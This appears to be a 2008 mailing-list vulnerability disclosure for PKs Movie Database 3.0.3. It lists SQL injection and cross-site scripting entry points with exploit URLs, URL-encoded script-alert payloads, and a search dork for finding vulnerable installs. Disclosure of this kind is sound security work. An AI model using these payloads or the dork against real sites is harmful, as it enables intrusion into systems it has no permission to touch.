Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Joomla <= v1.0.14- RC1(Index. php) Remote File Inclusion Exploit

Joovili <= v.2.1 (members_help. php) Remote File İnclude Vulnerability

Blackboard (id) Remote SQL Injection

Husrev Forums v2.0.1:PoWerBoard (tr) (id) Remote SQL Injection

From:	houssamix_(at)_hotmail.fr <houssamix_(at)_hotmail.fr>
Date:	10.02.2008
Subject:	PKs Movie Database version 3.0.3 (SQL/XSS)

-------------------------------------------------------------

H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo

-------------------------------------------------------------


= Author : HouSSaMix From H-T Team                          

= Script : PKs Movie Database version 3.0.3

                                                  

= BUG 1 :  Remote SQL Injection Vulnerability  


exploit => www.target.com/path/index.php?num=[SQL]


= BUG 2 : XSS


exploit => www.target.com/path/index.php?category=[XSS]

          www.target.com/path/index.php?num=9999999999&category=[XSS]


example : www.target.com/path/index.
php?category=%22%3E%3Cscript%3Ealert(1);%3C/script%
3E

          www.target.com/path/index.
php?num=9999999999&category=%22%3E%3Cscript%3Ealert(1)
;%3C/script%3E


= Dork : "PKs Movie Database"